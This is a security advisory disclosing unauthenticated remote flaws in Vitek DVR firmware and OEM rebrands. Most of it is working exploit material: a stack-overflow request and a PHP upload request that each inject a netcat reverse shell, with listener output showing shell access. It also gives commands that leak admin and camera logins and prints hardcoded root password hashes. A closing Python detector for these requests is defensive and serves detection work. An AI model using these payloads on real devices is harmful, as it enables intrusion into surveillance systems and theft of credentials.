Subject: Vitek RCE and Information Disclosure (and possible other OEM)
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 22, 2017
Full Disclosure: 0-day

heap: Executable + Non-ASLR
stack: Executable + ASLR

-[Manufacture Logo]-
[ASCII-art logo not recoverable from this copy]

-[OEM (found in the code)]-
Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
Thrive
Wisecon
Sanyo
Inodic
CBC
Elbex
Y3K
KTNC

-[Stack Overflow RCE]-

[Reverse netcat shell]
$ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n" | ncat 192.168.57.20 81

[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:36356.
pwd
/opt/fw
whoami
root
exit
$

Note:
1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20
2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4]
3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0

H1: VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6
.rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001CD138 SUB R3, R11, #0x74
.text:001CD13C MOV R0, R3
.text:001CD140 BL system

H4: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
.rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:00114AC8 SUB R3, R11, #0x74
.text:00114ACC MOV R0, R3
.text:00114AD0 BL system

N1: VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6
.rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001E9F0C SUB R3, R11, #0x74
.text:001E9F10 MOV R0, R3
.text:001E9F14 BL system

-[PHP RCE]-

Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted)

[Reverse netcat shell (forking)]
$ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST

200 OK
[...]
> ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody>
[...]

[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:52726.
pwd
/opt/www/htdocs/system
whoami
nobody
ls -l /mnt/usb2/
total 4
drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr
-rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||
exit
$

-[Login / Password Disclosure]-

curl -v "http://192.168.57.20:80/menu.env" | hexdump -C

[binary config, login and password can be found for admin login and all connected cameras]

Admin l/p
[...]
00001380  00 00 00 00 01 01 00 01  01 01 01 00 00 00 00 00  |................|
00001390  00 00 00 00 00 41 44 4d  49 4e 00 00 00 00 00 00  |.....ADMIN......|
000013a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001400  00 00 00 00 00 00 00 00  00 00 00 00 00 00 31 32  |..............12|
00001410  33 34 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |34..............|
00001420  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

Cameras l/p
[...]
00008d80  00 00 00 00 c0 00 a8 00  01 00 15 00 92 1f 00 00  |................|
00008d90  91 1f 00 00 72 6f 6f 74  00 00 00 00 00 00 00 00  |....root........|
00008da0  00 00 00 00 70 61 73 73  00 00 00 00 00 00 00 00  |....pass........|
00008db0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00008dc0  00 00 00 00 00 00 00 00  00 00 00 00 c0 00 a8 00  |................|
00008dd0  01 00 16 00 94 1f 00 00  93 1f 00 00 72 6f 6f 74  |............root|
00008de0  00 00 00 00 00 00 00 00  00 00 00 00 70 61 73 73  |............pass|
00008df0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

-[Hardcode l/p]-

FTP: TCP/10021
TELNET: TCP/10023

/etc/passwd
root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh
woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh

-[Korean hardcoded DNS]-

$ cat /etc/resolv.conf
nameserver 168.126.63.1
nameserver 0.0.0.0
nameserver 0.0.0.0
$

$ nslookup 168.126.63.1
1.63.126.168.in-addr.arpa name = kns.kornet.net.
$ nslookup 168.126.63.2
2.63.126.168.in-addr.arpa name = kns2.kornet.net.

-[Other Information Disclosure]-

curl -v "http://192.168.57.20:80/webviewer/netinfo.dat"
192,168,57,20
192,168,2,100
00:0A:2F:XX:XX:XX
00:0A:2F:YY:YY:YY
255.255.255.0
192.168.57.1

-[MAC Address Details]-
Company: Artnix Inc.
Address: Seoul 137-819, KOREA, REPUBLIC OF
Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF
Type: IEEE MA-L

curl -v "http://192.168.57.20:80/webviewer/gw.dat"
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.2.0     0.0.0.0         255.255.255.0   U     0      0        0 eth1
192.168.57.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
0.0.0.0         192.168.57.1    0.0.0.0         UG    0      0        0 eth0

curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0"
Change GUI Language to English

[... and more]
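As an added defender-side example (not part of bashis' advisory or the PoC repository), the following Python flags the three request shapes the advisory documents: ${IFS}-separated words or an oversized Authorization value sent to dvrcontrol.cgi, shell metacharacters in the upload_check.php multipart filename, and unauthenticated fetches of menu.env, netinfo.dat and gw.dat. The 256-byte Authorization threshold, the URL-encoded ${IFS} variant and the sample requests are assumptions constructed here, not values from the advisory.

```python
import re

# Static files the advisory shows being served without authentication.
SENSITIVE_PATHS = {"/menu.env", "/webviewer/netinfo.dat", "/webviewer/gw.dat"}
# ${IFS} as sent on the wire by the PoC, or URL-encoded (%24%7bIFS%7d); the
# encoded form is an assumed variant a proxy might log instead.
IFS_TOKEN = re.compile(r"\$\{IFS\}|%24%7bIFS%7d", re.IGNORECASE)
# Shell metacharacters that never belong in a firmware-upload filename.
SHELL_META = re.compile(r"[|;&`$]")
FILENAME_RE = re.compile(r'filename="([^"\r\n]*)"')
# Assumed threshold: the PoC pads the Authorization value with 272 bytes
# before the return address, far beyond any real Basic/Digest credential.
AUTH_MAX_LEN = 256


def inspect_request(method, path, headers, body=b""):
    """Return (rule, detail) findings for one HTTP request; [] means clean."""
    findings = []
    base, _, query = path.partition("?")
    if base in SENSITIVE_PATHS:
        findings.append(("config-disclosure", base))
    if base.endswith("/dvrcontrol.cgi"):
        if IFS_TOKEN.search(query):
            findings.append(("cmd-injection-ifs", query))
        for name, value in headers.items():
            # The PoC abuses a header named "Authorization Pwned": match by prefix.
            if name.lower().startswith("authorization") and len(value) > AUTH_MAX_LEN:
                findings.append(("oversized-authorization", f"{name}: {len(value)} bytes"))
    if method == "POST" and base.endswith("/upload_check.php"):
        for fname in FILENAME_RE.findall(body.decode("latin-1", "replace")):
            if SHELL_META.search(fname) or IFS_TOKEN.search(fname):
                findings.append(("upload-filename-metachar", fname))
    return findings


# Constructed sample traffic (not captured from a device): three hits, one clean.
SAMPLE_REQUESTS = [
    ("GET", "/dvrcontrol.cgi?x${IFS}y", {"Authorization Pwned": "A" * 300}, b""),
    ("POST", "/cgi-bin/php/htdocs/system/upload_check.php", {},
     b'--b\r\nContent-Disposition: form-data; name="userfile"; filename="a|b"\r\n\r\nX\r\n--b--\r\n'),
    ("GET", "/menu.env", {}, b""),
    ("GET", "/cgi-bin/php/lang_change.php?lang=0", {"Authorization": "Basic QUJD"}, b""),
]


def scan(requests=SAMPLE_REQUESTS):
    """Map each flagged request path to its findings; clean requests are omitted."""
    report = {}
    for method, path, headers, body in requests:
        hits = inspect_request(method, path, headers, body)
        if hits:
            report[path] = hits
    return report
```

Feed the same four-tuples from a web-server or proxy log parser into scan() to get an alert per matching request.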